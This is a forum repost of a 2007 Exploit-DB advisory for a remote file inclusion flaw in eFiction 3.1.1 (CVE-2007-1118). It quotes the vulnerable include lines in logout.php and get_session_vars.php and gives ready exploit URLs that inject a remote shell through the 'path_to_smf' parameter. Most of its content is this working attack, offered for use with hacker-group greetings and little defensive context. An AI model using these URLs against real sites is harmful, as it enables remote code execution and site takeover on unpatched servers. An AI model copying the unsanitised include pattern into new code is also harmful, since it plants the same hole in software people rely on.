Exploit eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3361
Проверка EDB
  1. Пройдено
Автор
THE DE@TH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1118
Дата публикации
2007-02-22
Код:
********************************************************************************
To ConTacT mE @ www.Asb-May.net/bb
ScRiPt:-http://www.efiction.org/downloads/eFiction31.zip
GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}   >>
******************************************************************************
logout.php:-
include_once($path_to_smf."Sources/Subs-Auth.php");

get_session_vars.php:-
require_once($path_to_smf."SSI.php");
********************************************************************************
ExPlOiT:-http://www.SitE.com/bridges/SMF/logout.php?path_to_smf=[Shell]
ExPlOiT:-http://www.SitE.com/get_session_vars.php?path_to_smf=[Shell]
********************************************************************************

# milw0rm.com [2007-02-22]
 
Источник
www.exploit-db.com

Похожие темы